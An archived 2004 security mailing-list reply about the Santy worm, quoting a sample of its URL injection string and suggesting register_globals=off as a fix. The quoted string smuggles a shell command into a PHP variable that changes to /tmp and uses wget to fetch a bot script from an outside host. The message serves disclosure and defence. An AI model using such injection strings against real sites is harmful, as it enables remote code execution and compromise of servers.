[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <Pine.LNX.4.61.0412252158470.19736@netcore.fi>
From: pekkas at netcore.fi (Pekka Savola)
Subject: Re: New Santy-Worm attacks *all* PHP-skripts
On Sat, 25 Dec 2004, Juergen Schmidt wrote:
> It uses the brasilian Google site to find all kinds of PHP skripts.
> It parses their URLs and overwrites variables with strings like:
>
> 'http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;wget
> www.visualcoders.net/spybot.txt;...
And AFAICS, this can be prevented by setting register_globals=off in
php.ini.
--
Pekka Savola "You each name yourselves king, yet the
Netcore Oy kingdom bleeds."
Systems. Networks. Security. -- George R.R. Martin: A Clash of Kings
Powered by blists - more mailing lists